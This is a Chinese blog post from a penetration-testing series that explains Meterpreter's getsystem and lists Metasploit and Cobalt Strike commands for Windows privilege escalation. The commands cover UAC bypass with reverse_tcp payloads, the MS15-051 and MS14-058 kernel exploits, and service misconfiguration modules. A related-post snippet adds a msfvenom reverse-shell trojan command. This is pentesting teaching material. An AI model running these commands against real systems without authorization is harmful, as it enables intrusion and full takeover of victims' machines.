渗透测试框架提权

于 2024-06-02 12:13:27 发布
阅读量705 收藏 9
点赞数 31
分类专栏: 内网渗透 渗透测试框架 文章标签: 内网 渗透测试 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80361487/article/details/139388350
版权

Metasploit自动提权

Meterpreter自动提权命令

getsystem:
getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户
1)getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
2)getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
3)Windows服务已启动,导致与命名管道建立连接。
4)该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
5)然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

bypassUAC

UAC:用户帐户控制(User Account Control),是windows操作系统中采用的一种控制机制,它以预见的
方式阻止不必要的系统范围更改
getsystem提权方式对于普通用户来说是失败的不可正常执行的,那么这种情况下就需要绕过系统UAC来进行
getsystem提权

进程注入

use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST=192.168.40.151
set session 1
exploit

内存注入

use exploit/windows/local/bypassuac_injection
set payload windows/meterpreter/reverse_tcp
set LHOST=192.168.1.170
set session 1
exploit

Eventvwr注册表项

use exploit/windows/local/bypassuac_eventvwr

COM处理程序劫持

use exploit/windows/local/bypassuac_comhijack 通过bypassUAC获取的session可以看到依然是普通权限,可以getsystem进行提权至system权限

kernel漏洞提权

windows-kernel-exploits(Windows平台提权漏洞集合):
https://github.com/SecWiki/windows-kernel-exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
exploit
优点:省去手动查找的麻烦
缺点:不是所有列出的local exploit都可用

unquoted_service_path

unquoted_service_path 模块
已弃用exploits/windows/local/trusted_service_path
exploit/windows/local/unquoted_service_path
set session 1
Exploit -j
use exploit/multi/handler
set autorunscript migrate –f
Exploit -j

service_permissions

service_permissions模块
use exploit/windows/local/service_permissions
set sessions 1
run

always_install_elevated

always_install_elevated模块
use exploit/windows/local/always_install_elevated
set sessions 1
run

Kernel privilege escalation

Windows ClientCopyImage Win32k Exploit
适用与win7 win server 2008R2SP1 x64
use exploit/windows/local/ms15_051_client_copy_image
set lhost xx.xx.xx.xx
set session 1
exploit

ms14_058提权

use exploit/windows/local/ms14_058_track_popup_menu
set lhost xx.xx.xx.xx
set session 1
exploit
https://www.freebuf.com/articles/system/184289.html

Cobaltstrike自动提权

CobaltStrike提权模块
beacon - Elevate
自用提权exe(自己弄来cve运行)
Powershell
下载链接
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
https://github.com/PowerShellMafia/PowerSploit/
help powershell-import
Use: powershell-import [/path/to/local/script.ps1]
SweetPotato
https://github.com/Tycx2ry/SweetPotato_CS
网安+硬件
关注
  • 31
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metapreter实现持续访问,自动化,提权--详细教程
qq_41245301的博客
01-05 608
1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称(非必要,用默认)REG_NAME 注册表设置的名称 (非必要,用默认)VBS_NAME VBS脚本的名称 (非必要,用默认)PATH 后门文件的存放路径 (非必要,用默认)SESSION 作用于那个会话。这里会自动执行文件中的命令
Meterpreter提权那些事
蚁景网安学院
06-20 813
一引言Meterpreter提权我们经常会遇到,熟悉它掌握它对渗透测试至关重要。竟然无法逃避就得学会征服它,接下来我会带领征服Meterpreter。二准备实验环境1.Kali lin...
后渗透之meterpreter使用攻略
钻石
01-06 8339
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
Meterpreter 提权
eli的博客
05-20 2166
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8227
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
内网渗透测试-提权工具
05-25
本文将深入探讨提权工具及其在内网渗透测试中的应用。 提权工具通常分为Windows系统和Linux系统的工具,因为这两种操作系统在企业环境中最为常见。Windows提权工具有如Meterpreter、Psexec、Empire等。Meterpreter...
渗透测试流程.zip
04-06
- **提权**:寻找并利用系统权限升级漏洞,以获取更高级别的访问权限。 5. **数据窃取与破坏** - **数据泄露**:搜索敏感信息,如数据库内容、用户凭证等。 - **服务破坏**:测试系统稳定性,可能导致拒绝服务的...
利用drozer进行Android渗透测试
01-22
3. **系统漏洞利用**:drozer可以扫描设备上的系统漏洞,并尝试利用它们以获取更高的权限,例如提权到root。 4. **数据泄露检测**:通过监控和分析应用的网络通信,drozer能找出可能的数据泄露情况,比如明文传输...
linux内核自动提权脚本.zip
02-01
只有在授权的渗透测试安全研究的合法框架内,才能使用这样的提权脚本。 9. **学习与研究**:对于安全研究人员和系统管理员来说,了解这些脚本的工作原理可以帮助他们更好地理解和防御类似的攻击。同时,这也是一...
linux提权教程
02-10
了解提权原理后,可以通过虚拟机环境实践各种提权技术,如Metasploit框架中的exploit模块,或使用Kali Linux等渗透测试发行版进行模拟攻击。 六、学习资源 1. Linux权限与文件系统管理:学习如何正确配置文件和目录...
12.1、后渗透测试--提权
无痕的博客
12-13 728
meterpreter后渗透阶段提权
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1718
利用meterpreter对win7系统进行提权
msf提权命令/meterpreter下的几个命令
aiquan9342的博客
04-30 612
废话: 今天本来日学校内网。以为是台08.结果稀里糊涂居然日了宿舍哥们儿的PC机。按道理都该装杀毒的才对,我舍友都不装的。裸装上阵说的就是我舍友了。劝各位大佬。把杀毒装好。补丁打好。 通过这次我也学到了以下几个msf提权相关的命令: 切换到另一个用户界面(该功能基于那些用户已登录)。 screenshot 对目标主机的屏幕进行截图。 upload file...
Meterpreter提权详解
子曰小玖的博客
08-08 3189
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
meterpreter之getsystem命令提权详解
redwand的博客
07-23 7629
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
meterpreter提权小结
MercyLin的博客
09-05 2977
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权 首先我们可以输入getuid来查看当前用户的权限~ 可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限. getsystem自动提权 输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限 这个就比较玄学,我还没成功过,可以看到g...
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
CobaltStrike渗透框架
最新发布
09-01
CobaltStrike提供了广泛的功能,包括命令和控制服务器、漏洞利用、社会工程学攻击、横向移动、提权和数据渗透等。它还支持团队合作,可以在渗透测试中进行团队协作和信息共享。CobaltStrike已经成为许多红队和渗透...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安+硬件

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值